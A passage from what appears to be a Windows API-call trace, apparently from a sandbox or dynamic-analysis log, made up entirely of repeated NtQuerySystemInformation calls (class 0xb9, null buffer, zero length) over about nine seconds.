NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0167.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0168.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0173.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 